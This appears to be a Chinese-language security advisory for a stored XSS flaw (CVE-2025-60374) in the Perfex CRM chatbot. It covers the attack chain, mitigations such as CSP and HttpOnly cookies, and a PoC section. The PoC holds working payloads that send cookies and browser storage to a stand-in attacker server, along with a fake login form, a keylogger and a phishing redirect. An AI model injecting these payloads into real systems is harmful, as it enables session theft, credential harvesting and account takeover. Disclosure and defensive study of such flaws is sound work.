CVE-2025-60374 Perfex CRM聊天机器人存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60374

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Perfex CRM chatbot

漏洞概述

CVE-2025-60374是Perfex CRM聊天机器人组件中的一个存储型跨站脚本（Stored XSS）漏洞，影响3.3.1之前的所有版本。该漏洞允许未经认证的远程攻击者通过聊天机器人功能注入任意HTML和JavaScript代码。由于是存储型XSS，恶意载荷会被持久化保存在服务器端，每当有合法用户访问或查看聊天内容时，恶意脚本将在受害者浏览器中自动执行。

该漏洞的CVSS 3.1评分为6.1，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），但需要用户交互（UI:R）才能触发。漏洞的影响范围已发生改变（S:C），表明该漏洞可以影响到超出其直接安全域的其他组件。

成功利用此漏洞可能导致客户端代码执行、用户会话令牌（Cookie）窃取、账户劫持、钓鱼攻击以及在受害者权限范围内执行其他恶意操作。此漏洞与CVE-2024-8867为不同的漏洞，表明Perfex CRM聊天机器人在XSS防护方面存在系统性的安全问题。鉴于Perfex CRM作为客户关系管理系统的广泛应用性，此漏洞对使用该系统的企业构成显著的安全风险，可能导致客户数据泄露和业务中断。

技术细节

Perfex CRM聊天机器人在3.3.1版本之前，未对用户输入的聊天消息内容进行充分的输出编码和过滤，导致存储型XSS漏洞的产生。

漏洞原理：
1. 聊天机器人功能接收用户提交的聊天消息，并将消息内容存储到数据库中。
2. 在消息存储过程中，应用程序未对用户输入中的HTML标签和JavaScript代码进行适当的转义或过滤。
3. 当其他用户（包括管理员和普通用户）查看聊天记录时，服务器直接从数据库读取原始内容并嵌入到HTML页面中进行渲染。
4. 浏览器将恶意载荷视为合法的HTML/JavaScript代码并执行。

利用方式：
攻击者无需认证即可通过聊天机器人接口提交包含恶意脚本的消息。典型的攻击载荷包括窃取Cookie的脚本（如document.location='http://attacker.com/steal?c='+document.cookie）、键盘记录器、伪造的登录表单或重定向脚本。由于载荷被持久化存储，任何查看该聊天会话的用户都会受到影响，攻击影响范围会随着时间推移不断扩大。

此漏洞与CVE-2024-8867不同，表明问题可能存在于聊天功能的不同输入字段或处理流程中，需要开发者进行全面的安全审计和修复。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别目标系统使用Perfex CRM且版本低于3.3.1，通过公开信息或扫描确认聊天机器人功能的存在和访问方式。

STEP 2

步骤2：载荷构造

攻击者构造包含恶意JavaScript代码的聊天消息，代码用于窃取Cookie、会话令牌或执行其他客户端恶意操作。

STEP 3

步骤3：载荷注入

攻击者通过聊天机器人接口提交恶意消息，由于无需认证（PR:N），攻击者可以直接发送消息。恶意载荷被存储到服务器数据库中。

STEP 4

步骤4：等待受害者

攻击者等待合法用户（如管理员或其他员工）查看聊天记录或与聊天机器人交互。

STEP 5

步骤5：恶意脚本执行

当受害者查看包含恶意载荷的聊天内容时，浏览器将恶意脚本作为合法代码执行，窃取Cookie、会话令牌或执行其他恶意操作。

STEP 6

步骤6：权限利用

攻击者利用窃取的会话令牌以受害者身份登录系统，获取未授权访问权限，可能导致数据泄露、权限提升或进一步的攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-60374 - Perfex CRM Stored XSS PoC -->
<!-- This PoC demonstrates a stored XSS vulnerability in Perfex CRM chatbot (versions < 3.3.1) -->
<!-- The malicious payload is submitted through the chatbot interface and stored on the server -->
<!-- When other users view the chat, the payload executes in their browser -->

<!-- Step 1: Craft the malicious chat message payload -->
<!-- The payload steals session cookies and sends them to the attacker's server -->
<script>
  // Steal session cookies
  var img = new Image();
  img.src = 'http://attacker-server.com/steal?cookie=' + encodeURIComponent(document.cookie);
  
  // Exfiltrate sensitive page content
  fetch('http://attacker-server.com/log', {
    method: 'POST',
    body: JSON.stringify({
      url: window.location.href,
      cookies: document.cookie,
      localStorage: JSON.stringify(localStorage),
      sessionStorage: JSON.stringify(sessionStorage)
    }),
    headers: {'Content-Type': 'application/json'}
  });
</script>

<!-- Alternative payloads for different attack scenarios -->

<!-- Payload 2: Fake login form (credential harvesting) -->
<form action="http://attacker-server.com/phish" method="POST">
  <h3>Session Expired - Please Re-login</h3>
  <input type="text" name="username" placeholder="Username"/>
  <input type="password" name="password" placeholder="Password"/>
  <input type="submit" value="Login"/>
</form>

<!-- Payload 3: Keylogger -->
<script>
  document.onkeypress = function(e) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://attacker-server.com/keylog?key=' + encodeURIComponent(e.key));
    xhr.send();
  };
</script>

<!-- Payload 4: Redirect to phishing page -->
<script>
  window.location.href = 'http://attacker-server.com/phishing';
</script>

<!-- Usage Instructions:
  1. Inject the payload through Perfex CRM chatbot message input
  2. Wait for a victim (admin or user) to view the chat conversation
  3. The malicious JavaScript executes automatically in the victim's browser
  4. Stolen credentials/cookies can be used to access the CRM system
-->

影响范围

Perfex CRM chatbot < 3.3.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web应用防火墙（WAF）中部署XSS防护规则，过滤常见的恶意脚本标签和事件处理器；2）配置Content Security Policy（CSP），限制内联脚本执行；3）为所有会话Cookie添加HttpOnly和Secure标志，防止JavaScript窃取；4）限制聊天机器人功能的访问权限，仅允许可信用户使用；5）定期清理和审查聊天记录中的可疑内容；6）监控异常的网络请求和数据外传行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60374
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60374
3 Details https://www.cvedetails.com/cve/CVE-2025-60374/
4 VulDB https://vuldb.com/cve/CVE-2025-60374
5 Link https://github.com/ajansha/CVE-2025-60374